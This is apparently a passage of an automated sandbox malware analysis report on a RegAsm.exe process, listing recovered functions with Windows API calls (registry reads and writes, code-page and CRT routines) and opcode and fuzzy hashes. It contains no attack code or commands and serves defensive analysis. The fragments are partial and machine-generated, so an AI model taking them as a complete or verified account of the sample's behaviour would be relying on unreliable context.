                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                      • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                      • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                      • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                      • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                      • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                                                                      • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                      • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                      • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                      • RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1818849710-0
                                                                                                                                                                      • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                      • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Info
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1807457897-3916222277
                                                                                                                                                                      • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                      • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                      • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Info
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1807457897-3916222277
                                                                                                                                                                      • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                                                      • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                                                                                      • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                      • String ID: pQG
                                                                                                                                                                      • API String ID: 176396367-3769108836
                                                                                                                                                                      • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                      • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                                                                      • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                      • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                                                                      APIs
                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      • API String ID: 2568140703-3893581201
                                                                                                                                                                      • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                      • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                                                      • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                                                      APIs
                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      • API String ID: 2568140703-3893581201
                                                                                                                                                                      • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                                                      • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                                                      • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                                                                      APIs
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                                                                                                      Strings
                                                                                                                                                                      • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                                                                      • API String ID: 2593887523-3084827643
                                                                                                                                                                      • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                                                      • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                                                                                                      • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                                                      • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Alloc
                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                      • API String ID: 2773662609-671089009
                                                                                                                                                                      • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                      • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Alloc
                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                      • API String ID: 2773662609-671089009
                                                                                                                                                                      • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                                                      • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                      • API String ID: 2742660187-671089009
                                                                                                                                                                      • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                      • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                                                      • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                      • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                      • API String ID: 2742660187-671089009
                                                                                                                                                                      • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                                                      • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                                                                                                      • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: GlobalMemoryStatus
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 1890195054-2766056989
                                                                                                                                                                      • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                      • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                      • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 546120528-0
                                                                                                                                                                      • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                      • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                                                      • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 546120528-0
                                                                                                                                                                      • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                      • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                                                                                      • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                      • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                        • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                        • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                        • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                        • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                        • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                        • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                      • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                      • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorLast_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2991157371-0
                                                                                                                                                                      • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                      • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                      • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                      • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                        • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                                                                                        • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                                                                                        • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                                                      • _free.LIBCMT ref: 0044F050
                                                                                                                                                                      • _free.LIBCMT ref: 0044F086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorLast_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2991157371-0
                                                                                                                                                                      • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                      • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2279764990-0
                                                                                                                                                                      • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                                      • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                                                      • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
